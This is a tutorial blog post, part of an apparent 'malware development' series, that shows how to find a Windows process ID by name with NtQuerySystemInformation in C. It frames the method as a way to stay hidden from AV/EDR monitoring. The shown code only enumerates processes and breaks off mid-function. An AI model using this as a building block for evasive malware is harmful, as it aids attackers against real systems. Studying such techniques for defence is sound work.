Malware development trick 55: enum process via NtQuerySystemInformation. Simple C example.

cocomelonc.github.io · cocomelonc · 3 months ago · tutorial
﷽

Hello, cybersecurity enthusiasts and white hackers!

In one of my early posts, I demonstrated how to find a process ID using the standard CreateToolhelp32Snapshot API. While effective, it is a very common technique that is heavily monitored by AV/EDR solutions and easily spotted by malware analysts. Another big issue is performance! Today, we will look at a more "stealthy" and lower-level approach: using the undocumented (or semi-documented) NtQuerySystemInformation function from ntdll.dll.

## NtQuerySystemInformation function

NtQuerySystemInformation is a powerful function in the Windows Native API that allows a caller to retrieve various types of system information.

```c
__kernel_entry NTSTATUS NtQuerySystemInformation(
  [in]            SYSTEM_INFORMATION_CLASS SystemInformationClass,
  [in, out]       PVOID                    SystemInformation,
  [in]            ULONG                    SystemInformationLength,
  [out, optional] PULONG                   ReturnLength
);
```

Please note the first line in the documentation:

> NtQuerySystemInformation may be altered or unavailable in future versions of Windows. Applications should use the alternate functions listed in this topic.

WTF??? ok.

To enumerate processes, we use the SystemProcessInformation class. This returns a buffer containing a sequence of SYSTEM_PROCESS_INFORMATION structures, one for each process running on the system.

## practical example

First of all we need to resolve the API.
Since NtQuerySystemInformation is not exported by the standard headers in a way that is easy to use, we manually get its address from ntdll.dll using GetProcAddress:

```c
// typedef NtQuerySystemInformation
typedef NTSTATUS (NTAPI *fnNtQuerySystemInformation)(
  SYSTEM_INFORMATION_CLASS SystemInformationClass,
  PVOID SystemInformation,
  ULONG SystemInformationLength,
  PULONG ReturnLength
);

//...

pNtQuerySystemInformation = (fnNtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
```

Then we determine the buffer size. We don't know how much memory we need for all the process structures, so we call the function once with a NULL buffer. It fails (with STATUS_INFO_LENGTH_MISMATCH), but it returns the required length in ReturnLength:

```c
// get buffer size
pNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)5, NULL, 0, &uReturnLen);
```

(SYSTEM_INFORMATION_CLASS)5 is simply the numeric value of SystemProcessInformation. Then we allocate the required buffer on the heap:

```c
// allocate memory
SystemProcInfo = (PSYSTEM_PROCESS_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)uReturnLen);
if (SystemProcInfo == NULL) {
  HeapFree(GetProcessHeap(), 0, szTargetProc);
  return 0;
}
pValueToFree = SystemProcInfo;
```

And we call the function a second time with the allocated buffer:

```c
// get information about processes
STATUS = pNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)5, SystemProcInfo, uReturnLen, &uReturnLen);
if (STATUS != 0) {
  HeapFree(GetProcessHeap(), 0, pValueToFree);
  HeapFree(GetProcessHeap(), 0, szTargetProc);
  return 0;
}
```

One caveat: processes can be created between the two calls, in which case the second call fails with the same length-mismatch status because the buffer is now too small. Robust code retries with the newly returned length (or allocates some slack up front) instead of giving up.

Finally we just enumerate and compare. The data is a linked list of sorts: each structure points to the next one via NextEntryOffset, and an offset of 0 marks the last entry. We compare our target process name with the ImageName.Buffer in each structure:

```c
// enum
while (TRUE) {
  if (SystemProcInfo->ImageName.Length && SystemProcInfo->ImageName.Buffer) {
    if (wcscmp(SystemProcInfo->ImageName.Buffer, szTargetProc) == 0) {
      pid = (int)(ULONG_PTR)SystemProcInfo->UniqueProcessId;
      break;
    }
  }
  if (!SystemProcInfo->NextEntryOffset) break;
  SystemProcInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONG_PTR)SystemProcInfo + SystemProcInfo->NextEntryOffset);
}
```

Note that wcscmp is case-sensitive and ImageName holds only the base name of the image as the kernel recorded it, so the name passed on the command line has to match that spelling exactly (use _wcsicmp if case should not matter).

Free the heap memory and return the PID:

```c
// cleanup
HeapFree(GetProcessHeap(), 0, pValueToFree);
HeapFree(GetProcessHeap(), 0, szTargetProc);
return pid;
```

One important detail: the process names inside the kernel are stored as UNICODE_STRING (WideChar). Since our input is usually an ANSI string (char*), we must convert it using MultiByteToWideChar before comparing:

```c
// convert ANSI to WideChar (LPCWSTR) for comparison
int nLen = MultiByteToWideChar(CP_ACP, 0, procName, -1, NULL, 0);
WCHAR *szTargetProc = (WCHAR *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nLen * sizeof(WCHAR));
if (szTargetProc == NULL) return 0;
MultiByteToWideChar(CP_ACP, 0, procName, -1, szTargetProc, nLen);
```

The full source code looks like the following (hack.c):

```c
/*
 * hack.c
 * process enum via NtQuerySystemInformation
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2025/12/26/malware-trick-55.html
 */
#include <windows.h>
#include <stdio.h>

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntexapi.h#L1324
typedef enum _SYSTEM_INFORMATION_CLASS {
  SystemBasicInformation, // q: SYSTEM_BASIC_INFORMATION
  SystemProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION
  SystemPerformanceInformation, // q: SYSTEM_PERFORMANCE_INFORMATION
  SystemTimeOfDayInformation, // q: SYSTEM_TIMEOFDAY_INFORMATION
  SystemPathInformation, // not implemented
  SystemProcessInformation, // q: SYSTEM_PROCESS_INFORMATION
  SystemCallCountInformation, // q: SYSTEM_CALL_COUNT_INFORMATION
  SystemDeviceInformation, // q: SYSTEM_DEVICE_INFORMATION
  SystemProcessorPerformanceInformation, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION (EX in: USHORT ProcessorGroup)
  SystemFlagsInformation, // q: SYSTEM_FLAGS_INFORMATION
  SystemCallTimeInformation, // not implemented // SYSTEM_CALL_TIME_INFORMATION // 10
  SystemModuleInformation, // q: RTL_PROCESS_MODULES
  SystemLocksInformation, // q: RTL_PROCESS_LOCKS
  SystemStackTraceInformation, // q: RTL_PROCESS_BACKTRACES
  SystemPagedPoolInformation, // not implemented
  SystemNonPagedPoolInformation, // not implemented
  SystemHandleInformation, // q: SYSTEM_HANDLE_INFORMATION
  SystemObjectInformation, // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION
  SystemPageFileInformation, // q: SYSTEM_PAGEFILE_INFORMATION
  SystemVdmInstemulInformation, // q: SYSTEM_VDM_INSTEMUL_INFO
  SystemVdmBopInformation, // not implemented // 20
  SystemFileCacheInformation, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache)
  SystemPoolTagInformation, // q: SYSTEM_POOLTAG_INFORMATION
  SystemInterruptInformation, // q: SYSTEM_INTERRUPT_INFORMATION (EX in: USHORT ProcessorGroup)
  SystemDpcBehaviorInformation, // q: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege)
  SystemFullMemoryInformation, // not implemented // SYSTEM_MEMORY_USAGE_INFORMATION
  SystemLoadGdiDriverInformation, // s (kernel-mode only)
  SystemUnloadGdiDriverInformation, // s (kernel-mode only)
  SystemTimeAdjustmentInformation, // q: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege)
  SystemSummaryMemoryInformation, // not implemented // SYSTEM_MEMORY_USAGE_INFORMATION
  SystemMirrorMemoryInformation, // s (requires license value "Kernel-MemoryMirroringSupported") (requires SeShutdownPrivilege) // 30
  SystemPerformanceTraceInformation, // q; s: (type depends on EVENT_TRACE_INFORMATION_CLASS)
  SystemObsolete0, // not implemented
  SystemExceptionInformation, // q: SYSTEM_EXCEPTION_INFORMATION
  SystemCrashDumpStateInformation, // s: SYSTEM_CRASH_DUMP_STATE_INFORMATION (requires SeDebugPrivilege)
  SystemKernelDebuggerInformation, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION
  SystemContextSwitchInformation, // q: SYSTEM_CONTEXT_SWITCH_INFORMATION
  SystemRegistryQuotaInformation, // q: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege)
  SystemExtendServiceTableInformation, // s (requires SeLoadDriverPrivilege) // loads win32k only
  SystemPrioritySeperation, // s (requires SeTcbPrivilege)
  SystemVerifierAddDriverInformation, // s (requires SeDebugPrivilege) // 40
  SystemVerifierRemoveDriverInformation, // s (requires SeDebugPrivilege)
  SystemProcessorIdleInformation, // q: SYSTEM_PROCESSOR_IDLE_INFORMATION (EX in: USHORT ProcessorGroup)
  SystemLegacyDriverInformation, // q: SYSTEM_LEGACY_DRIVER_INFORMATION
  SystemCurrentTimeZoneInformation, // q; s: RTL_TIME_ZONE_INFORMATION
  SystemLookasideInformation, // q: SYSTEM_LOOKASIDE_INFORMATION
  SystemTimeSlipNotification, // s: HANDLE (NtCreateEvent) (requires SeSystemtimePrivilege)
  SystemSessionCreate, // not implemented
  SystemSessionDetach, // not implemented
  SystemSessionInformation, // not implemented (SYSTEM_SESSION_INFORMATION)
  SystemRangeStartInformation, // q: SYSTEM_RANGE_START_INFORMATION // 50
  SystemVerifierInformation, // q: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege)
  SystemVerifierThunkExtend, // s (kernel-mode only)
  SystemSessionProcessInformation, // q: SYSTEM_SESSION_PROCESS_INFORMATION
  SystemLoadGdiDriverInSystemSpace, // s: SYSTEM_GDI_DRIVER_INFORMATION (kernel-mode only) (same as SystemLoadGdiDriverInformation)
  SystemNumaProcessorMap, // q: SYSTEM_NUMA_INFORMATION
  SystemPrefetcherInformation, // q; s: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation
  SystemExtendedProcessInformation, // q: SYSTEM_PROCESS_INFORMATION
  SystemRecommendedSharedDataAlignment, // q: ULONG // KeGetRecommendedSharedDataAlignment
  SystemComPlusPackage, // q; s: ULONG
  SystemNumaAvailableMemory, // q: SYSTEM_NUMA_INFORMATION // 60
  SystemProcessorPowerInformation, // q: SYSTEM_PROCESSOR_POWER_INFORMATION (EX in: USHORT ProcessorGroup)
  SystemEmulationBasicInformation, // q: SYSTEM_BASIC_INFORMATION
  SystemEmulationProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION
  SystemExtendedHandleInformation, // q: SYSTEM_HANDLE_INFORMATION_EX
  SystemLostDelayedWriteInformation, // q: ULONG
  SystemBigPoolInformation, // q: SYSTEM_BIGPOOL_INFORMATION
  SystemSessionPoolTagInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION
  SystemSessionMappedViewInformation, // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION
  SystemHotpatchInformation, // q; s: SYSTEM_HOTPATCH_CODE_INFORMATION
  SystemObjectSecurityMode, // q: ULONG // 70
  SystemWatchdogTimerHandler, // s: SYSTEM_WATCHDOG_HANDLER_INFORMATION // (kernel-mode only)
  SystemWatchdogTimerInformation, // q: SYSTEM_WATCHDOG_TIMER_INFORMATION // (kernel-mode only)
  SystemLogicalProcessorInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION (EX in: USHORT ProcessorGroup)
  SystemWow64SharedInformationObsolete, // not implemented
  SystemRegisterFirmwareTableInformationHandler, // s: SYSTEM_FIRMWARE_TABLE_HANDLER // (kernel-mode only)
  SystemFirmwareTableInformation, // SYSTEM_FIRMWARE_TABLE_INFORMATION
  SystemModuleInformationEx, // q: RTL_PROCESS_MODULE_INFORMATION_EX
  SystemVerifierTriageInformation, // not implemented
  SystemSuperfetchInformation, // q; s: SUPERFETCH_INFORMATION // PfQuerySuperfetchInformation
  SystemMemoryListInformation, // q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege) // 80
  SystemFileCacheInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation)
  SystemThreadPriorityClientIdInformation, // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege)
  SystemProcessorIdleCycleTimeInformation, // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup)
  SystemVerifierCancellationInformation, // SYSTEM_VERIFIER_CANCELLATION_INFORMATION // name:wow64:whNT32QuerySystemVerifierCancellationInformation
  SystemProcessorPowerInformationEx, // not implemented
  SystemRefTraceInformation, // q; s: SYSTEM_REF_TRACE_INFORMATION // ObQueryRefTraceInformation
  SystemSpecialPoolInformation, // q; s: SYSTEM_SPECIAL_POOL_INFORMATION (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0
  SystemProcessIdInformation, // q: SYSTEM_PROCESS_ID_INFORMATION
  SystemErrorPortInformation, // s (requires SeTcbPrivilege)
  SystemBootEnvironmentInformation, // q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION // 90
  SystemHypervisorInformation, // q: SYSTEM_HYPERVISOR_QUERY_INFORMATION
  SystemVerifierInformationEx, // q; s: SYSTEM_VERIFIER_INFORMATION_EX
  SystemTimeZoneInformation, // q; s: RTL_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege)
  SystemImageFileExecutionOptionsInformation, // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege)
  SystemCoverageInformation, // q: COVERAGE_MODULES s: COVERAGE_MODULE_REQUEST // ExpCovQueryInformation (requires SeDebugPrivilege)
  SystemPrefetchPatchInformation, // SYSTEM_PREFETCH_PATCH_INFORMATION
  SystemVerifierFaultsInformation, // s: SYSTEM_VERIFIER_FAULTS_INFORMATION (requires SeDebugPrivilege)
  SystemSystemPartitionInformation, // q: SYSTEM_SYSTEM_PARTITION_INFORMATION
  SystemSystemDiskInformation, // q: SYSTEM_SYSTEM_DISK_INFORMATION
  SystemProcessorPerformanceDistribution, // q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION (EX in: USHORT ProcessorGroup) // 100
  SystemNumaProximityNodeInformation, // q; s: SYSTEM_NUMA_PROXIMITY_MAP
  SystemDynamicTimeZoneInformation, // q; s: RTL_DYNAMIC_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege)
  SystemCodeIntegrityInformation, // q: SYSTEM_CODEINTEGRITY_INFORMATION // SeCodeIntegrityQueryInformation
  SystemProcessorMicrocodeUpdateInformation, // s: SYSTEM_PROCESSOR_MICROCODE_UPDATE_INFORMATION
  SystemProcessorBrandString, // q: CHAR[] // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23
  SystemVirtualAddressInformation, // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation
  SystemLogicalProcessorAndGroupInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX (EX in: LOGICAL_PROCESSOR_RELATIONSHIP RelationshipType) // since WIN7 // KeQueryLogicalProcessorRelationship
  SystemProcessorCycleTimeInformation, // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup)
  SystemStoreInformation, // q; s: SYSTEM_STORE_INFORMATION (requires SeProfileSingleProcessPrivilege) // SmQueryStoreInformation
  SystemRegistryAppendString, // s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS // 110
  SystemAitSamplingValue, // s: ULONG (requires SeProfileSingleProcessPrivilege)
  SystemVhdBootInformation, // q: SYSTEM_VHD_BOOT_INFORMATION
  SystemCpuQuotaInformation, // q; s: PS_CPU_QUOTA_QUERY_INFORMATION
  SystemNativeBasicInformation, // q: SYSTEM_BASIC_INFORMATION
  SystemErrorPortTimeouts, // SYSTEM_ERROR_PORT_TIMEOUTS
  SystemLowPriorityIoInformation, // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION
  SystemTpmBootEntropyInformation, // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation
  SystemVerifierCountersInformation, // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION
  SystemPagedPoolInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool)
  SystemSystemPtesInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes) // 120
  SystemNodeDistanceInformation, // q: USHORT[4*NumaNodes] // (EX in: USHORT NodeNumber)
  SystemAcpiAuditInformation, // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26
  SystemBasicPerformanceInformation, // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation
  SystemQueryPerformanceCounterInformation, // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1
  SystemSessionBigPoolInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION // since WIN8
  SystemBootGraphicsInformation, // q; s: SYSTEM_BOOT_GRAPHICS_INFORMATION (kernel-mode only)
  SystemScrubPhysicalMemoryInformation, // q; s: MEMORY_SCRUB_INFORMATION
  SystemBadPageInformation,
  SystemProcessorProfileControlArea, // q; s: SYSTEM_PROCESSOR_PROFILE_CONTROL_AREA
  SystemCombinePhysicalMemoryInformation, // s: MEMORY_COMBINE_INFORMATION, MEMORY_COMBINE_INFORMATION_EX, MEMORY_COMBINE_INFORMATION_EX2 // 130
  SystemEntropyInterruptTimingInformation, // q; s: SYSTEM_ENTROPY_TIMING_INFORMATION
  SystemConsoleInformation, // q; s: SYSTEM_CONSOLE_INFORMATION
  SystemPlatformBinaryInformation, // q: SYSTEM_PLATFORM_BINARY_INFORMATION (requires SeTcbPrivilege)
  SystemPolicyInformation, // q: SYSTEM_POLICY_INFORMATION (Warbird/Encrypt/Decrypt/Execute)
  SystemHypervisorProcessorCountInformation, // q: SYSTEM_HYPERVISOR_PROCESSOR_COUNT_INFORMATION
  SystemDeviceDataInformation, // q: SYSTEM_DEVICE_DATA_INFORMATION
  SystemDeviceDataEnumerationInformation, // q: SYSTEM_DEVICE_DATA_INFORMATION
  SystemMemoryTopologyInformation, // q: SYSTEM_MEMORY_TOPOLOGY_INFORMATION
  SystemMemoryChannelInformation, // q: SYSTEM_MEMORY_CHANNEL_INFORMATION
  SystemBootLogoInformation, // q: SYSTEM_BOOT_LOGO_INFORMATION // 140
  SystemProcessorPerformanceInformationEx, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // (EX in: USHORT ProcessorGroup) // since WINBLUE
  SystemCriticalProcessErrorLogInformation,
  SystemSecureBootPolicyInformation, // q: SYSTEM_SECUREBOOT_POLICY_INFORMATION
  SystemPageFileInformationEx, // q: SYSTEM_PAGEFILE_INFORMATION_EX
  SystemSecureBootInformation, // q: SYSTEM_SECUREBOOT_INFORMATION
  SystemEntropyInterruptTimingRawInformation,
  SystemPortableWorkspaceEfiLauncherInformation, // q: SYSTEM_PORTABLE_WORKSPACE_EFI_LAUNCHER_INFORMATION
  SystemFullProcessInformation, // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin)
  SystemKernelDebuggerInformationEx, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX
  SystemBootMetadataInformation, // 150
  SystemSoftRebootInformation, // q: ULONG
  SystemElamCertificateInformation, // s: SYSTEM_ELAM_CERTIFICATE_INFORMATION
  SystemOfflineDumpConfigInformation, // q: OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2
  SystemProcessorFeaturesInformation, // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION
  SystemRegistryReconciliationInformation, // s: NULL (requires admin) (flushes registry hives)
  SystemEdidInformation, // q: SYSTEM_EDID_INFORMATION
  SystemManufacturingInformation, // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD
  SystemEnergyEstimationConfigInformation, // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION
  SystemHypervisorDetailInformation, // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION
  SystemProcessorCycleStatsInformation, // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION (EX in: USHORT ProcessorGroup) // 160
  SystemVmGenerationCountInformation,
  SystemTrustedPlatformModuleInformation, // q: SYSTEM_TPM_INFORMATION
  SystemKernelDebuggerFlags, // SYSTEM_KERNEL_DEBUGGER_FLAGS
  SystemCodeIntegrityPolicyInformation, // q; s: SYSTEM_CODEINTEGRITYPOLICY_INFORMATION
  SystemIsolatedUserModeInformation, // q: SYSTEM_ISOLATED_USER_MODE_INFORMATION
  SystemHardwareSecurityTestInterfaceResultsInformation,
  SystemSingleModuleInformation, // q: SYSTEM_SINGLE_MODULE_INFORMATION
  SystemAllowedCpuSetsInformation,
  SystemVsmProtectionInformation, // q: SYSTEM_VSM_PROTECTION_INFORMATION (previously SystemDmaProtectionInformation)
  SystemInterruptCpuSetsInformation, // q: SYSTEM_INTERRUPT_CPU_SET_INFORMATION // 170
  SystemSecureBootPolicyFullInformation, // q: SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION
  SystemCodeIntegrityPolicyFullInformation,
  SystemAffinitizedInterruptProcessorInformation, // (requires SeIncreaseBasePriorityPrivilege)
  SystemRootSiloInformation, // q: SYSTEM_ROOT_SILO_INFORMATION
  SystemCpuSetInformation, // q: SYSTEM_CPU_SET_INFORMATION // since THRESHOLD2
  SystemCpuSetTagInformation, // q: SYSTEM_CPU_SET_TAG_INFORMATION
  SystemWin32WerStartCallout,
  SystemSecureKernelProfileInformation, // q: SYSTEM_SECURE_KERNEL_HYPERGUARD_PROFILE_INFORMATION
  SystemCodeIntegrityPlatformManifestInformation, // q: SYSTEM_SECUREBOOT_PLATFORM_MANIFEST_INFORMATION // since REDSTONE
  SystemInterruptSteeringInformation, // SYSTEM_INTERRUPT_STEERING_INFORMATION_INPUT // 180
  SystemSupportedProcessorArchitectures, // p: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx
  SystemMemoryUsageInformation, // q: SYSTEM_MEMORY_USAGE_INFORMATION
  SystemCodeIntegrityCertificateInformation, // q: SYSTEM_CODEINTEGRITY_CERTIFICATE_INFORMATION
  SystemPhysicalMemoryInformation, // q: SYSTEM_PHYSICAL_MEMORY_INFORMATION // since REDSTONE2
  SystemControlFlowTransition, // (Warbird/Encrypt/Decrypt/Execute)
  SystemKernelDebuggingAllowed, // s: ULONG
  SystemActivityModerationExeState, // SYSTEM_ACTIVITY_MODERATION_EXE_STATE
  SystemActivityModerationUserSettings, // SYSTEM_ACTIVITY_MODERATION_USER_SETTINGS
  SystemCodeIntegrityPoliciesFullInformation,
  SystemCodeIntegrityUnlockInformation, // SYSTEM_CODEINTEGRITY_UNLOCK_INFORMATION // 190
  SystemIntegrityQuotaInformation,
  SystemFlushInformation, // q: SYSTEM_FLUSH_INFORMATION
  SystemProcessorIdleMaskInformation, // q: ULONG_PTR[ActiveGroupCount] // since REDSTONE3
  SystemSecureDumpEncryptionInformation,
  SystemWriteConstraintInformation, // SYSTEM_WRITE_CONSTRAINT_INFORMATION
  SystemKernelVaShadowInformation, // SYSTEM_KERNEL_VA_SHADOW_INFORMATION
  SystemHypervisorSharedPageInformation, // SYSTEM_HYPERVISOR_SHARED_PAGE_INFORMATION // since REDSTONE4
  SystemFirmwareBootPerformanceInformation,
  SystemCodeIntegrityVerificationInformation, // SYSTEM_CODEINTEGRITYVERIFICATION_INFORMATION
  SystemFirmwarePartitionInformation, // SYSTEM_FIRMWARE_PARTITION_INFORMATION // 200
  SystemSpeculationControlInformation, // SYSTEM_SPECULATION_CONTROL_INFORMATION // (CVE-2017-5715) REDSTONE3 and above.
  SystemDmaGuardPolicyInformation, // SYSTEM_DMA_GUARD_POLICY_INFORMATION
  SystemEnclaveLaunchControlInformation, // SYSTEM_ENCLAVE_LAUNCH_CONTROL_INFORMATION
  SystemWorkloadAllowedCpuSetsInformation, // SYSTEM_WORKLOAD_ALLOWED_CPU_SET_INFORMATION // since REDSTONE5
  SystemCodeIntegrityUnlockModeInformation,
  SystemLeapSecondInformation, // SYSTEM_LEAP_SECOND_INFORMATION
  SystemFlags2Information, // q: SYSTEM_FLAGS_INFORMATION
  SystemSecurityModelInformation, // SYSTEM_SECURITY_MODEL_INFORMATION // since 19H1
  SystemCodeIntegritySyntheticCacheInformation,
  SystemFeatureConfigurationInformation, // SYSTEM_FEATURE_CONFIGURATION_INFORMATION // since 20H1 // 210
  SystemFeatureConfigurationSectionInformation, // SYSTEM_FEATURE_CONFIGURATION_SECTIONS_INFORMATION
  SystemFeatureUsageSubscriptionInformation, // SYSTEM_FEATURE_USAGE_SUBSCRIPTION_DETAILS
  SystemSecureSpeculationControlInformation, // SECURE_SPECULATION_CONTROL_INFORMATION
  SystemSpacesBootInformation, // since 20H2
  SystemFwRamdiskInformation, // SYSTEM_FIRMWARE_RAMDISK_INFORMATION
  SystemWheaIpmiHardwareInformation,
  SystemDifSetRuleClassInformation,
  SystemDifClearRuleClassInformation,
  SystemDifApplyPluginVerificationOnDriver,
  SystemDifRemovePluginVerificationOnDriver, // 220
  SystemShadowStackInformation, // SYSTEM_SHADOW_STACK_INFORMATION
  SystemBuildVersionInformation, // SYSTEM_BUILD_VERSION_INFORMATION
  SystemPoolLimitInformation, // SYSTEM_POOL_LIMIT_INFORMATION (requires SeIncreaseQuotaPrivilege)
  SystemCodeIntegrityAddDynamicStore,
  SystemCodeIntegrityClearDynamicStores,
  SystemDifPoolTrackingInformation,
  SystemPoolZeroingInformation, // SYSTEM_POOL_ZEROING_INFORMATION
  SystemDpcWatchdogInformation,
  SystemDpcWatchdogInformation2,
  SystemSupportedProcessorArchitectures2, // q: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx // 230
  SystemSingleProcessorRelationshipInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // (EX in: PROCESSOR_NUMBER Processor)
  SystemXfgCheckFailureInformation,
  SystemIommuStateInformation, // SYSTEM_IOMMU_STATE_INFORMATION // since 22H1
  SystemHypervisorMinrootInformation, // SYSTEM_HYPERVISOR_MINROOT_INFORMATION
  SystemHypervisorBootPagesInformation, // SYSTEM_HYPERVISOR_BOOT_PAGES_INFORMATION
  SystemPointerAuthInformation, // SYSTEM_POINTER_AUTH_INFORMATION
  SystemSecureKernelDebuggerInformation,
  SystemOriginalImageFeatureInformation,
  MaxSystemInfoClass
} SYSTEM_INFORMATION_CLASS;

// https://processhacker.sourceforge.io/doc/ntbasic_8h.html
typedef LONG KPRIORITY;

// https://doxygen.reactos.org/da/df4/struct__SYSTEM__PROCESS__INFORMATION.html
typedef struct _SYSTEM_PROCESS_INFORMATION {
  ULONG NextEntryOffset;
  ULONG NumberOfThreads;
  LARGE_INTEGER WorkingSetPrivateSize; // VISTA
  ULONG HardFaultCount; // WIN7
  ULONG NumberOfThreadsHighWatermark; // WIN7
  ULONGLONG CycleTime; // WIN7
  LARGE_INTEGER CreateTime;
  LARGE_INTEGER UserTime;
  LARGE_INTEGER KernelTime;
  UNICODE_STRING ImageName;
  KPRIORITY BasePriority;
  HANDLE UniqueProcessId;
  HANDLE InheritedFromUniqueProcessId;
  ULONG HandleCount;
  ULONG SessionId;
  ULONG_PTR PageDirectoryBase;
  SIZE_T PeakVirtualSize;
  SIZE_T VirtualSize;
  ULONG PageFaultCount;
  SIZE_T PeakWorkingSetSize;
  SIZE_T WorkingSetSize;
  SIZE_T QuotaPeakPagedPoolUsage;
  SIZE_T QuotaPagedPoolUsage;
  SIZE_T QuotaPeakNonPagedPoolUsage;
  SIZE_T QuotaNonPagedPoolUsage;
  SIZE_T PagefileUsage;
  SIZE_T PeakPagefileUsage;
  SIZE_T PrivatePageCount;
  LARGE_INTEGER ReadOperationCount;
  LARGE_INTEGER WriteOperationCount;
  LARGE_INTEGER OtherOperationCount;
  LARGE_INTEGER ReadTransferCount;
  LARGE_INTEGER WriteTransferCount;
  LARGE_INTEGER OtherTransferCount;
  // SYSTEM_THREAD_INFORMATION TH[1];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

// typedef NtQuerySystemInformation
typedef NTSTATUS (NTAPI *fnNtQuerySystemInformation)(
  SYSTEM_INFORMATION_CLASS SystemInformationClass,
  PVOID SystemInformation,
  ULONG SystemInformationLength,
  PULONG ReturnLength
);

int findMyProc(const char *procName) {
  fnNtQuerySystemInformation pNtQuerySystemInformation = NULL;
  ULONG uReturnLen = 0;
  PSYSTEM_PROCESS_INFORMATION SystemProcInfo = NULL;
  PVOID pValueToFree = NULL;
  NTSTATUS STATUS = 0;
  int pid = 0;

  // get function address from ntdll
  pNtQuerySystemInformation = (fnNtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
  if (pNtQuerySystemInformation == NULL) return 0;

  // convert ANSI to WideChar (LPCWSTR) for comparison
  int nLen = MultiByteToWideChar(CP_ACP, 0, procName, -1, NULL, 0);
  WCHAR *szTargetProc = (WCHAR *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nLen * sizeof(WCHAR));
  if (szTargetProc == NULL) return 0;
  MultiByteToWideChar(CP_ACP, 0, procName, -1, szTargetProc, nLen);

  // get buffer size: this call fails with STATUS_INFO_LENGTH_MISMATCH and fills uReturnLen
